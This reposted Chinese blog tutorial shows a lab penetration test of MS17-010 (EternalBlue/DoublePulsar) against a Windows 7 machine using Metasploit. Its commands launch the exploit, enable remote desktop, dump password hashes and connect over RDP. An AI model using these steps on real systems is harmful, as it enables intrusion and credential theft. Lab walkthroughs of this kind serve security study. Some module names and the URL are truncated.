首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >Metasploit渗透测试(双脉冲星)

Metasploit渗透测试(双脉冲星)

作者头像
落寞的鱼丶
发布2021-12-13 15:40:08
发布2021-12-13 15:40:08
1.9K0
举报
文章被收录于专栏:afjhahfhahajkafjhahfhahajk

MS17-010(EternalBlue)

靶机:win7:service Pack1 172.16.5.201

靶机下载

攻击机:kali 172.16.5.158

而且要保证两台机器之间可以ping通

因为kali里面没有这个rb源代码 所以我们要把这个模块导入进去

我们先要smb模块下载到这里面

代码语言:javascript
复制
#cd /usr/share/metasploit-framework/modules/exploits/windows/smb
#https://github.com/1stPeak/Eternalblue-Doublepulsar-Metasploit-maste
将Eternalblue-Doublepulsar-Metasploit文件夹depseternalblue_doublepulsar.rb复制到/smb目录下然后删除EternalblueDoublepulsar-Metasploit文件夹
#apt-get update 更新kali
#apt-get install wine32 安装wine32
win32(兼容层) 可以在Linux操作系统上运行 Windows 应用的兼容层
#msfconsole 开启Msf控制台
#use exploit/windows/smb/eternalblue_doublepulsa
#show options 看设置选项
#set RHOST 172.16.5.201
#set PROCESSINJECT explorer.exe
#exploit 执行利用

这个时候我们就进入了后渗透模块 如果不知道用什么命令可以 -h

查看目标机的系统信息

meterpreter> sysinfo

meterpreter> run getgui -e

开启靶机远程桌面

meterpreter >run———— windows/gather/smart_hashdump

获取了账号和密码使用 rdesktop 进行远程连接

rdesktop 172.16.5.201

最后可以看到已经连接到靶机了,说明渗透成功,如果对大家有帮助话麻烦大家一键三连谢谢大家!

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档